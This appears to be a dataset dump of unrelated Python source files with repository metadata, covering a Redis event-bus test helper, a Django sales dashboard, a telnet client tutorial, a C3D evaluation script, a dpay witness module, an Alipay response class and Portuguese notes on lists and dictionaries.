from tests.modules.base.mothers.message_meta_mother import MessageMetaMother
from tests.modules.extra.rabbitmq.mother.defaults import (
DEFAULT_ORGANIZATION,
DEFAULT_SERVICE,
)
class RedisDomainEventBusMother:
@staticmethod
def default(redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
)
@staticmethod
def with_service(service: str, redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, service, redis_database=redis_database
)
@staticmethod
def with_info_id(redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
).with_meta(MessageMetaMother.with_meta_with_info())
| [
"[email protected]"
]
| |
7cc33ebc7a5a6efaa96b3f5637c6c092cbb63f0e | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /djangox_project/dashboard.py | eb9198581b4738fb580239ff7a68d3b04ec30954 | [
"MIT"
]
| permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 1,948 | py | from controlcenter import Dashboard, widgets
from django.db.models import Count, Sum
from contact.models import Customer
from sales.models import Invoice, Month, Receipt
class InvList(widgets.ItemList):
model = Invoice
list_display = ("pk", "customer", "balance")
class Invoice_count(widgets.SingleBarChart):
# label and series
values_list = ("month", "count_items")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(count_items=Count("id"))
)
# limit_to = 10
class Invoice_cash_value(widgets.SingleBarChart):
# label and series
values_list = ("month", "total")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.filter(balancetype="Cash")
.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(total=Sum("balance"))
)
# limit_to = 10
def legend(self):
# Displays labels in legend
return [x for x, y in self.values]
class Invoice_metal_value(widgets.SingleBarChart):
# label and series
values_list = ("month", "total")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.filter(balancetype="Metal")
.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(total=Sum("balance"))
)
# limit_to = 10
class MyDash(Dashboard):
widgets = (InvList, Invoice_count, Invoice_cash_value, Invoice_metal_value)
| [
"[email protected]"
]
| |
8541223ee9f41ea6a340339066aea93077edc297 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.py | d7551b1104f4f2bde286e2ba13e3fff4fae60a31 | []
| no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[249.348292,31.217889], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
07ab7a01d4a5fca02f2117dc9fa9530abe06a1bb | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_sentinel_B.py | a41cfb9d61b9bf2318a0b766282b89ad303786f1 | []
| no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 833 | py | import sys
def flip(inStr, end):
arr = [x for x in inStr]
for x in xrange(end+1):
arr[x] = '+' if arr[x] == '-' else '-'
return "".join(arr)
def processRecord(inStr):
n = 0
while '-' in inStr:
n = n+1
end = inStr.rfind('-')
# start = end
# while start >= 1 and arr[start-1] == '-':
# start = start -1
inStr = flip(inStr, end)
return n
def processLine(fp, x):
result = processRecord(fp.readline())
print 'Case #{}: {}'.format(x, result)
def main():
filename = sys.argv[1]
try:
fp = open(filename)
records = int(fp.readline())
for x in xrange(records):
processLine(fp, x+1)
fp.close()
except Exception as e:
print e
raise e
if __name__ == '__main__':
main()
| [
"[[email protected]]"
]
| |
fdb4b8beb6788367b69cf674f43dbed29e7f26ed | 0b5be4b9162c19cf0d98972e52ce80aa8af47f0a | /High_Level_Coding_python3/7/7_3.py | 00a2b2d5a943d5ec99617a57f6fa2a786190cb36 | []
| no_license | Air-Zhuang/Test35 | 374c974a2a7693fff21be81278c1bb59a050f7ee | d9f92b7a025c91b7503f02afc896ac769f818a84 | refs/heads/master | 2021-06-19T12:36:13.383878 | 2019-09-21T08:02:43 | 2019-09-21T08:02:43 | 147,629,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | '''
实现类似with的让对象支持上下文管理
'''
'''
实现上下文管理协议,需定义实例的__enter__,__exit__
方法,他们分别在with开始和结束时被调用
'''
from sys import stdin, stdout
import getpass
import telnetlib
from collections import deque
class TelnetClient:
def __init__(self, host, port=23):
self.host = host
self.port = port
def __enter__(self):
self.tn = telnetlib.Telnet(self.host, self.port)
self.history = deque([])
return self #这里要返回值
def __exit__(self, exc_type, exc_value, exc_tb):
print('IN __exit__', exc_type, exc_value, exc_tb)
self.tn.close()
self.tn = None
with open('history.txt', 'a') as f:
f.writelines(self.history)
return True
def login(self):
# user
self.tn.read_until(b"login: ")
user = input("Enter your remote account: ")
self.tn.write(user.encode('utf8') + b"\n")
# password
self.tn.read_until(b"Password: ")
password = getpass.getpass()
self.tn.write(password.encode('utf8') + b"\n")
out = self.tn.read_until(b'$ ')
stdout.write(out.decode('utf8'))
def interact(self):
while True:
cmd = stdin.readline()
if not cmd:
break
self.history.append(cmd)
self.tn.write(cmd.encode('utf8'))
out = self.tn.read_until(b'$ ').decode('utf8')
stdout.write(out[len(cmd)+1:])
stdout.flush()
# client = TelnetClient('192.168.0.105')
# client.connect()
# client.login()
# client.interact()
# client.cleanup()
with TelnetClient('192.168.0.105') as client:
raise Exception('TEST')
client.login()
client.interact()
print('END')
| [
"[email protected]"
]
| |
e13861ef225236bfe4712ae37af04bc652f4bb50 | 1caa4080e82a6b18f7c2e52fea25b4e66c0b331b | /C3D-tensorflow-master/lstm.py | c46aa01205fcfec6f0b76e847fdc804da1a3c1e3 | []
| no_license | xixiareone/ouyangruo | 18dd0ae00e54f96ed3f61cd303f486c3c9c84de7 | 7605dbac97ed7ceeef92c14622aa0d7defb52bee | refs/heads/master | 2021-01-21T13:34:33.276346 | 2019-06-18T07:25:21 | 2019-06-18T07:25:21 | 40,350,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,509 | py | #!/usr/bin/env python
"""Evaluates the C3D network"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import math
import time
import tensorflow as tf
import numpy as np
import c3d_feature
import input_data
# Basic model parameters as external flags.
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('gpu_num', 1,
"""How many GPUs to use""")
tf.app.flags.DEFINE_integer('batch_size', 10,
"""Batch size.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,
"""How often to run the eval.""")
tf.app.flags.DEFINE_string('checkpoint_dir', 'result',
"""Check point directory.""")
tf.app.flags.DEFINE_boolean('run_once', True,
"""Whether to run eval only once.""")
tf.app.flags.DEFINE_integer('num_examples', 5000,
"""Number of examples to run.""")
def placeholder_inputs(batch_size):
"""Generate placeholder variables to represent the input tensors.
These placeholders are used as inputs by the rest of the model building
code and will be fed from the downloaded data in the .run() loop, below.
Args:
batch_size: The batch size will be baked into both placeholders.
Returns:
images_placeholder: Images placeholder.
labels_placeholder: Labels placeholder.
"""
# Note that the shapes of the placeholders match the shapes of the full
# image and label tensors, except the first dimension is now batch_size
# rather than the full size of the train or test data sets.
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
c3d_feature.NUM_FRAMES_PER_CLIP,
c3d_feature.CROP_SIZE,
c3d_feature.CROP_SIZE,
c3d_feature.CHANNELS))
labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
return images_placeholder, labels_placeholder
def eval_once(saver, top_k_op, images_placeholder,
labels_placeholder):
"""Run Eval once.
Args:
saver: Saver.
top_k_op: Top K op.
"""
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# Assuming model_checkpoint_path looks something like:
# /my-favorite-path/cifar10_train/model.ckpt-0,
# extract global_step from it.
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
else:
print('No checkpoint file found')
return
# Start the queue runners.
coord = tf.train.Coordinator()
try:
threads = []
for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
start=True))
num_iter = int(math.ceil(FLAGS.num_examples / FLAGS.batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * FLAGS.batch_size
step = 0
while step < num_iter and not coord.should_stop():
eval_images, eval_labels, _, _, _ = input_data.read_clip_and_label(
filename='list/test.list',
batch_size=FLAGS.batch_size,
num_frames_per_clip=c3d_feature.NUM_FRAMES_PER_CLIP,
crop_size=c3d_feature.CROP_SIZE,
shuffle=True)
predictions = sess.run([top_k_op],
feed_dict={
images_placeholder: eval_images,
labels_placeholder: eval_labels})
true_count += np.sum(predictions)
step += 1
if step % 10 == 0:
print("%i/100" % int(step/num_iter))
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
coord.request_stop()
coord.join(threads, stop_grace_period_secs=10)
def evaluate():
with tf.Graph().as_default() as g:
# Get the image and the labels placeholder
images_placeholder, labels_placeholder = placeholder_inputs(FLAGS.batch_size)
# Build the Graph that computes the logits predictions from the inference
# model.
with tf.variable_scope('c3d_var'):
logits = c3d_feature.inference_c3d(images_placeholder)
top_k_op = tf.nn.in_top_k(logits, labels_placeholder, 1)
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(
c3d_feature.MOVING_AVERAGE_DECAY)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
while True:
eval_once(saver, top_k_op, images_placeholder, labels_placeholder)
if FLAGS.run_once:
break
time.sleep(FLAGS.eval_interval_secs)
def main(_):
evaluate()
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
]
| |
04f1ca1c36019f37f910e36c383332a9c75eed8c | a22cc323b29f50da397d8363ac2521e3542a0fd7 | /dpaycli/witness.py | d1aea67432b47c9dfcfca1603775a20e8c24aa4a | [
"MIT"
]
| permissive | dpays/dpay-cli | 1a58c7dae45218e3b05b7e17ff5ce03e918d27b9 | dfa80898e1faea2cee92ebec6fe04873381bd40f | refs/heads/master | 2020-04-01T09:26:43.200933 | 2018-10-15T08:03:06 | 2018-10-15T08:03:06 | 153,075,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,321 | py | # This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
import json
from dpaycli.instance import shared_dpay_instance
from dpaycligraphenebase.py23 import bytes_types, integer_types, string_types, text_type
from .account import Account
from .amount import Amount
from .exceptions import WitnessDoesNotExistsException
from .blockchainobject import BlockchainObject
from .utils import formatTimeString
from datetime import datetime, timedelta, date
from dpayclibase import transactions, operations
from dpaycligraphenebase.account import PrivateKey, PublicKey
import pytz
from prettytable import PrettyTable
class Witness(BlockchainObject):
""" Read data about a witness in the chain
:param str account_name: Name of the witness
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import Witness
>>> Witness("gtg")
<Witness gtg>
"""
type_id = 3
def __init__(
self,
owner,
full=False,
lazy=False,
dpay_instance=None
):
self.full = full
self.lazy = lazy
self.dpay = dpay_instance or shared_dpay_instance()
if isinstance(owner, dict):
owner = self._parse_json_data(owner)
super(Witness, self).__init__(
owner,
lazy=lazy,
full=full,
id_item="owner",
dpay_instance=dpay_instance
)
def refresh(self):
if not self.identifier:
return
if not self.dpay.is_connected():
return
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
witness = self.dpay.rpc.find_witnesses({'owners': [self.identifier]}, api="database")['witnesses']
if len(witness) > 0:
witness = witness[0]
else:
witness = self.dpay.rpc.get_witness_by_account(self.identifier)
if not witness:
raise WitnessDoesNotExistsException(self.identifier)
witness = self._parse_json_data(witness)
super(Witness, self).__init__(witness, id_item="owner", lazy=self.lazy, full=self.full, dpay_instance=self.dpay)
def _parse_json_data(self, witness):
parse_times = [
"created", "last_bbd_exchange_update", "hardfork_time_vote",
]
for p in parse_times:
if p in witness and isinstance(witness.get(p), string_types):
witness[p] = formatTimeString(witness.get(p, "1970-01-01T00:00:00"))
parse_int = [
"votes", "virtual_last_update", "virtual_position", "virtual_scheduled_time",
]
for p in parse_int:
if p in witness and isinstance(witness.get(p), string_types):
witness[p] = int(witness.get(p, "0"))
return witness
def json(self):
output = self.copy()
parse_times = [
"created", "last_bbd_exchange_update", "hardfork_time_vote",
]
for p in parse_times:
if p in output:
p_date = output.get(p, datetime(1970, 1, 1, 0, 0))
if isinstance(p_date, (datetime, date)):
output[p] = formatTimeString(p_date)
else:
output[p] = p_date
parse_int = [
"votes", "virtual_last_update", "virtual_position", "virtual_scheduled_time",
]
for p in parse_int:
if p in output and isinstance(output[p], integer_types):
output[p] = str(output[p])
return json.loads(str(json.dumps(output)))
@property
def account(self):
return Account(self["owner"], dpay_instance=self.dpay)
@property
def is_active(self):
return len(self['signing_key']) > 3 and self['signing_key'][3:] != '1111111111111111111111111111111114T1Anm'
def feed_publish(self,
base,
quote=None,
account=None):
""" Publish a feed price as a witness.
:param float base: USD Price of BEX in BBD (implied price)
:param float quote: (optional) Quote Price. Should be 1.000 (default), unless
we are adjusting the feed to support the peg.
:param str account: (optional) the source account for the transfer
if not self["owner"]
"""
quote = quote if quote is not None else "1.000 %s" % (self.dpay.symbol)
if not account:
account = self["owner"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, dpay_instance=self.dpay)
if isinstance(base, Amount):
base = Amount(base, dpay_instance=self.dpay)
elif isinstance(base, string_types):
base = Amount(base, dpay_instance=self.dpay)
else:
base = Amount(base, self.dpay.bbd_symbol, dpay_instance=self.dpay)
if isinstance(quote, Amount):
quote = Amount(quote, dpay_instance=self.dpay)
elif isinstance(quote, string_types):
quote = Amount(quote, dpay_instance=self.dpay)
else:
quote = Amount(quote, self.dpay.dpay_symbol, dpay_instance=self.dpay)
if not base.symbol == self.dpay.bbd_symbol:
raise AssertionError()
if not quote.symbol == self.dpay.dpay_symbol:
raise AssertionError()
op = operations.Feed_publish(
**{
"publisher": account["name"],
"exchange_rate": {
"base": base,
"quote": quote,
},
"prefix": self.dpay.prefix,
})
return self.dpay.finalizeOp(op, account, "active")
def update(self, signing_key, url, props, account=None):
""" Update witness
:param pubkey signing_key: Signing key
:param str url: URL
:param dict props: Properties
:param str account: (optional) witness account name
Properties:::
{
"account_creation_fee": x,
"maximum_block_size": x,
"bbd_interest_rate": x,
}
"""
if not account:
account = self["owner"]
return self.dpay.witness_update(signing_key, url, props, account=account)
class WitnessesObject(list):
def printAsTable(self, sort_key="votes", reverse=True, return_str=False, **kwargs):
utc = pytz.timezone('UTC')
table_header = ["Name", "Votes [PV]", "Disabled", "Missed", "Feed base", "Feed quote", "Feed update", "Fee", "Size", "Interest", "Version"]
t = PrettyTable(table_header)
t.align = "l"
if sort_key == 'base':
sortedList = sorted(self, key=lambda self: self['bbd_exchange_rate']['base'], reverse=reverse)
elif sort_key == 'quote':
sortedList = sorted(self, key=lambda self: self['bbd_exchange_rate']['quote'], reverse=reverse)
elif sort_key == 'last_bbd_exchange_update':
sortedList = sorted(self, key=lambda self: (utc.localize(datetime.utcnow()) - self['last_bbd_exchange_update']).total_seconds(), reverse=reverse)
elif sort_key == 'account_creation_fee':
sortedList = sorted(self, key=lambda self: self['props']['account_creation_fee'], reverse=reverse)
elif sort_key == 'bbd_interest_rate':
sortedList = sorted(self, key=lambda self: self['props']['bbd_interest_rate'], reverse=reverse)
elif sort_key == 'maximum_block_size':
sortedList = sorted(self, key=lambda self: self['props']['maximum_block_size'], reverse=reverse)
elif sort_key == 'votes':
sortedList = sorted(self, key=lambda self: int(self[sort_key]), reverse=reverse)
else:
sortedList = sorted(self, key=lambda self: self[sort_key], reverse=reverse)
for witness in sortedList:
td = utc.localize(datetime.utcnow()) - witness['last_bbd_exchange_update']
disabled = ""
if not witness.is_active:
disabled = "yes"
t.add_row([witness['owner'],
str(round(int(witness['votes']) / 1e15, 2)),
disabled,
str(witness['total_missed']),
str(Amount(witness['bbd_exchange_rate']['base'], dpay_instance=self.dpay)),
str(Amount(witness['bbd_exchange_rate']['quote'], dpay_instance=self.dpay)),
str(td.days) + " days " + str(td.seconds // 3600) + ":" + str((td.seconds // 60) % 60),
str(witness['props']['account_creation_fee']),
str(witness['props']['maximum_block_size']),
str(witness['props']['bbd_interest_rate'] / 100) + " %",
witness['running_version']])
if return_str:
return t.get_string(**kwargs)
else:
print(t.get_string(**kwargs))
def get_votes_sum(self):
vote_sum = 0
for witness in self:
vote_sum += int(witness['votes'])
return vote_sum
def __contains__(self, item):
from .account import Account
if isinstance(item, Account):
name = item["name"]
elif self.dpay:
account = Account(item, dpay_instance=self.dpay)
name = account["name"]
return (
any([name == x["owner"] for x in self])
)
def __str__(self):
return self.printAsTable(return_str=True)
def __repr__(self):
return "<%s %s>" % (
self.__class__.__name__, str(self.identifier))
class Witnesses(WitnessesObject):
""" Obtain a list of **active** witnesses and the current schedule
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import Witnesses
>>> Witnesses()
<Witnesses >
"""
def __init__(self, lazy=False, full=True, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.lazy = lazy
self.full = full
self.refresh()
def refresh(self):
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
self.active_witnessess = self.dpay.rpc.get_active_witnesses(api="database")['witnesses']
self.schedule = self.dpay.rpc.get_witness_schedule(api="database")
self.witness_count = self.dpay.rpc.get_witness_count(api="condenser")
else:
self.active_witnessess = self.dpay.rpc.get_active_witnesses()
self.schedule = self.dpay.rpc.get_witness_schedule()
self.witness_count = self.dpay.rpc.get_witness_count()
self.current_witness = self.dpay.get_dynamic_global_properties(use_stored_data=False)["current_witness"]
self.identifier = ""
super(Witnesses, self).__init__(
[
Witness(x, lazy=self.lazy, full=self.full, dpay_instance=self.dpay)
for x in self.active_witnessess
]
)
class WitnessesVotedByAccount(WitnessesObject):
""" Obtain a list of witnesses which have been voted by an account
:param str account: Account name
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import WitnessesVotedByAccount
>>> WitnessesVotedByAccount("gtg")
<WitnessesVotedByAccount gtg>
"""
def __init__(self, account, lazy=False, full=True, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.account = Account(account, full=True, dpay_instance=self.dpay)
account_name = self.account["name"]
self.identifier = account_name
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
if "witnesses_voted_for" not in self.account:
return
limit = self.account["witnesses_voted_for"]
witnessess_dict = self.dpay.rpc.list_witness_votes({'start': [account_name], 'limit': limit, 'order': 'by_account_witness'}, api="database")['votes']
witnessess = []
for w in witnessess_dict:
witnessess.append(w["witness"])
else:
if "witness_votes" not in self.account:
return
witnessess = self.account["witness_votes"]
super(WitnessesVotedByAccount, self).__init__(
[
Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay)
for x in witnessess
]
)
class WitnessesRankedByVote(WitnessesObject):
""" Obtain a list of witnesses ranked by Vote
:param str from_account: Witness name from which the lists starts (default = "")
:param int limit: Limits the number of shown witnesses (default = 100)
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import WitnessesRankedByVote
>>> WitnessesRankedByVote(limit=100)
<WitnessesRankedByVote >
"""
def __init__(self, from_account="", limit=100, lazy=False, full=False, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
witnessList = []
last_limit = limit
self.identifier = ""
use_condenser = True
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase() and not use_condenser:
query_limit = 1000
else:
query_limit = 100
if self.dpay.rpc.get_use_appbase() and not use_condenser and from_account == "":
last_account = None
elif self.dpay.rpc.get_use_appbase() and not use_condenser:
last_account = Witness(from_account, dpay_instance=self.dpay)["votes"]
else:
last_account = from_account
if limit > query_limit:
while last_limit > query_limit:
tmpList = WitnessesRankedByVote(last_account, query_limit)
if (last_limit < limit):
witnessList.extend(tmpList[1:])
last_limit -= query_limit - 1
else:
witnessList.extend(tmpList)
last_limit -= query_limit
if self.dpay.rpc.get_use_appbase():
last_account = witnessList[-1]["votes"]
else:
last_account = witnessList[-1]["owner"]
if (last_limit < limit):
last_limit += 1
if self.dpay.rpc.get_use_appbase() and not use_condenser:
witnessess = self.dpay.rpc.list_witnesses({'start': [last_account], 'limit': last_limit, 'order': 'by_vote_name'}, api="database")['witnesses']
elif self.dpay.rpc.get_use_appbase() and use_condenser:
witnessess = self.dpay.rpc.get_witnesses_by_vote(last_account, last_limit, api="condenser")
else:
witnessess = self.dpay.rpc.get_witnesses_by_vote(last_account, last_limit)
# self.witness_count = len(self.voted_witnessess)
if (last_limit < limit):
witnessess = witnessess[1:]
if len(witnessess) > 0:
for x in witnessess:
witnessList.append(Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay))
if len(witnessList) == 0:
return
super(WitnessesRankedByVote, self).__init__(witnessList)
class ListWitnesses(WitnessesObject):
""" List witnesses ranked by name
:param str from_account: Witness name from which the lists starts (default = "")
:param int limit: Limits the number of shown witnesses (default = 100)
:param dpay dpay_instance: DPay() instance to use when
accesing a RPC
.. code-block:: python
>>> from dpaycli.witness import ListWitnesses
>>> ListWitnesses(from_account="gtg", limit=100)
<ListWitnesses gtg>
"""
def __init__(self, from_account="", limit=100, lazy=False, full=False, dpay_instance=None):
self.dpay = dpay_instance or shared_dpay_instance()
self.identifier = from_account
self.dpay.rpc.set_next_node_on_empty_reply(False)
if self.dpay.rpc.get_use_appbase():
witnessess = self.dpay.rpc.list_witnesses({'start': from_account, 'limit': limit, 'order': 'by_name'}, api="database")['witnesses']
else:
witnessess = self.dpay.rpc.lookup_witness_accounts(from_account, limit)
if len(witnessess) == 0:
return
super(ListWitnesses, self).__init__(
[
Witness(x, lazy=lazy, full=full, dpay_instance=self.dpay)
for x in witnessess
]
)
| [
"[email protected]"
]
| |
59bdae501fd433ab656acdf1e66228192742d2a8 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/refactoring/inlineFunction/alreadyImported/main.after.py | 3e9e96b979cc28cb9af71a1be22c835a9fd5a934 | [
"Apache-2.0"
]
| permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 56 | py | from src import bar
x = bar(1)
y = bar(2)
res = 2 + y | [
"[email protected]"
]
| |
f94d8cdd200a2667c1805cec6a55df31c3973965 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayBossFncAntbudgetReturnResponse.py | 3836054a78a576ebfb9a36c10cf8e6cab2ecc400 | [
"Apache-2.0"
]
| permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.BizActionLogDTO import BizActionLogDTO
class AlipayBossFncAntbudgetReturnResponse(AlipayResponse):
def __init__(self):
super(AlipayBossFncAntbudgetReturnResponse, self).__init__()
self._result_data = None
self._result_msg = None
@property
def result_data(self):
return self._result_data
@result_data.setter
def result_data(self, value):
if isinstance(value, BizActionLogDTO):
self._result_data = value
else:
self._result_data = BizActionLogDTO.from_alipay_dict(value)
@property
def result_msg(self):
return self._result_msg
@result_msg.setter
def result_msg(self, value):
self._result_msg = value
def parse_response_content(self, response_content):
response = super(AlipayBossFncAntbudgetReturnResponse, self).parse_response_content(response_content)
if 'result_data' in response:
self.result_data = response['result_data']
if 'result_msg' in response:
self.result_msg = response['result_msg']
| [
"[email protected]"
]
| |
13979bc36eda56037d981c8724576dc7b10b6db5 | 7bb9bd2bdadef1590b2ef7ff309e08abf454e49d | /Resolução de problemas II/ListasTuplasDeicionários.py | 8665bcc291cd1e736c9ae453965659f17ca9745c | []
| no_license | ALREstevam/Curso-de-Python-e-Programacao-com-Python | afdf12717a710f20d4513d5df375ba63ba1e1c19 | af6227376736e63810e5979be54eb1c433d669ac | refs/heads/master | 2021-09-07T12:11:17.158298 | 2018-02-22T17:47:19 | 2018-02-22T17:47:19 | 87,453,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | '''
Arrays são chamados de sequências
Tipos
String
s = 'texto'
Lista
São elementos mútáveis
Podem ter elementos de diferentes tipos
l = ['asa', 1]
Tupla
t = (1, 2, 3)
Tuplas e strings não são mutáveis
Mapping (relacionam chave ao valor)
Acesso
Com números positivos e negativos
0 1 2 3
[] [] [] []
-1 -2 -3 -4
Úteis
aList = []
for number in range(1,11):
aList += [number] #Adiciona elementos na listas
#Os dois elementos são listas
print(aList)
==============================================================
#Via elemento
for item in aList:
print(item) #imprime todos os elementos da lista
#Via índice
for i in range(len(aList)):
print(aList[i]) #imprime todos os elementos da lista
===============================================================
Histograma
values = [0] * 10 # cria uma lista com 10 valores iguais a zero
print('10 inteiros')
for i in range(10):
newValue = int(input('Valor: '))
for i in range(len(values)):
print(values[i] * '*')
==============================================================
Tuplas - lista que não pode ser mudada
currentHour = hour, minute, second
print(currentTime[0])
===============================================================
Desempacotar sequências
aString = 'abc'
first, second, third = aString
===============================================================
Slicing
sequencia[inicio : ]
sequencia[inicio : fim]
sequencia[ : fim]
sequencia[inicio : incremento : fim]
até fim-1
===============================================================
Dicionários
Coleção de valores associativos
Chave -> valor
dictionart = {}
dictionary = {1 : 'one', 2 : 'two'}
> Manipulando
nums = {1 : 'one', 2 : 'two'}
nums[3] = 'three' #adiciona ao dicionárioo
del nums[3] #removendo 3
nums[1] = 'ones' #alterando valor
===============================================================
Métodos = lista, tupla, dicionário (built-in types)
append(item) Insere item no final da lista
count( elemento ) Retorna o número de ocorrencias de elemento na lista.
extend( newList ) Insere os elementos de newList no final da lista
index( elemento ) Returna o indice da primeira ocorrência de elemento na lista
insert( indice, item ) Insere item na posição indice
pop( [indice] ) Sem parametro – remove e retorna o último elemento da lista. Se indice é especificado, remove e retorna o elemento na posição indice.
remove( elemento ) Remove a primeira ocorrencia de elemento da lista.
reverse() Inverte o conteúdo da lista
sort( [function] ) Ordena o conteúdo da lista.
===============================================================
Mpetodos de dicionário
clear() Apaga todos os item do dicionário
copy() Cria uma cópia do dicionário. Cópia referencia o dicionário original
get( key [, returnValue] ) Retorna o valor associado à chave. Se chave não está no dicionário e returnValue é dado, retorna-o.
has_key( key ) Returna 1 se a chave está no dicionário; 0 se não está.
items() Retorna uma lista de tuplas no formato chave-valor.
keys() Retorna uma lista das chaves do dicionário.
popitem() Remove e retorna um par arbitrário como uma tupla de dois elementos.
setdefault( key [,value] ) Se key não está no dicionário e value é especificado, insere o par key-value. Se value não é especificado, value é None.
update( newDictionary ) Adiciona todos pares chave-valor de newDictionary ao dicionário corrente e sobrescreve os valores para as chaves ja existentes.
values() Retorna uma lista de valores no dicionário.
for key in dicionario.keys():
from copy import deepcopy
copiaDistinta = deepcopy(dictionary)
'''
list = ['a','b','c']
list.remove('a')
print(list) | [
"[email protected]"
]
| |
